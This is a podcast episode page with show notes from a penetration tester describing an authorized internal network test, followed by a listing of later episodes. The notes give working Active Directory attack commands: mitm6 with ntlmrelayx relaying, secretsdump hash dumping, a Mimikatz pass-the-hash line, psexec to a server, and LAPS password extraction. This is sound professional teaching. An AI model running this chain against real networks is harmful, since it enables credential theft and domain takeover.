7MS #455: Tales of Internal Network Pentest Pwnage - Part 24

7MS #455: Tales of Internal Network Pentest Pwnage - Part 24

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

  • I got to use some of my new CRTP skills!

  • Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

Get-DomainUser -PreauthNotRequired
  • Check for misconfigured LAPS installs with Get-LAPSPasswords!

  • The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn +
    ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!

  • When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!

  • SharpShares is a cool way to find shares your account has access to.

  • I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information

  • Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

  • Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!

  • Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

Det här avsnittet är hämtat från ett öppet RSS-flöde och publiceras inte av Podme. Det kan innehålla reklam.

Avsnitt(741)

7MS #741: Tales of Pentest Pwnage - Part 91

7MS #741: Tales of Pentest Pwnage - Part 91

Hey friends! Today's tale of pentest pwnage is brought to you by four hours of sleep, a large mint hot cocoa, and unhealthy levels of giggity. There's a very good reason for all three, but you'll have...

25 Sep 36min

7MS #740: Tales of Pentest Pwnage - Part 90

7MS #740: Tales of Pentest Pwnage - Part 90

Hey friends! We've been on a bit of a Tales of Pentest Pwnage bender lately, so let's keep it rolling with Part 90. (And Mom, relax — this is not one pentest story chopped into 90 parts.) Today is les...

18 Sep 33min

7MS #739: Tales of Pentest Pwnage – Part 89

7MS #739: Tales of Pentest Pwnage – Part 89

Hey friends! Today is a tale of pentest pwnage episode, and this one features a path to escalation I have never seen before – one I could only find few references on the entire Internet. It happened c...

11 Sep 17min

7MS #738: Baby's First ProjectDiscovery Neo

7MS #738: Baby's First ProjectDiscovery Neo

Hey friends! Today I'm talking about Baby's First Neo — and to be crystal clear, I don't mean Keanu, and I don't mean the R&B guy with the hat. I mean the AI-powered pentest assistant from our pals at...

4 Sep 29min

7MS #737: Tales of Pentest Pwnage – Part 88

7MS #737: Tales of Pentest Pwnage – Part 88

Hello friends! Today's tale of pentest pwnage isn't a start-to-finish march to DA – it's me finally emptying out the backlog of "gosh, I've got to share this next time" internal network tips that have...

28 Aug 33min

7MS #736: Securing Your Family During and After a Disaster – Part 9

7MS #736: Securing Your Family During and After a Disaster – Part 9

Hey friends! Today's another slice of our Securing Your Family During and After a Disaster miniseries, and fair warning — it's a bit of a Friday mood-ruiner. It's been almost two months since my dad p...

21 Aug 29min

7MS #735: Baby's First Cloudflare Tunnel

7MS #735: Baby's First Cloudflare Tunnel

Hey friends! Today's episode has a new-to-me toy up front and some podcast housekeeping on the back half – all recorded with a raging case of the anxious parent giggidies, because my son Atticus had a...

14 Aug 24min

7MS #734: Insight Recon

7MS #734: Insight Recon

Hey friends! Today's episode is a two-parter: some security stuff up front, and then a big ol' personal celebration on the back half. If you're strictly here for the security bits, I love you and you'...

7 Aug 32min

Populärt inom Politik & nyheter

svenska-fall
aftonbladet-krim
fordomspodden
p3-krim
rss-krimstad
flashback-forever
rss-expressen-dok
spar
aftonbladet-daily
rss-vad-fan-hande
rss-sanning-konsekvens
svd-ledarredaktionen
rss-krimreportrarna
politiken
rss-flodet
rss-utopia-2
omni-podd
rss-frandfors-horna
motiv
kungligt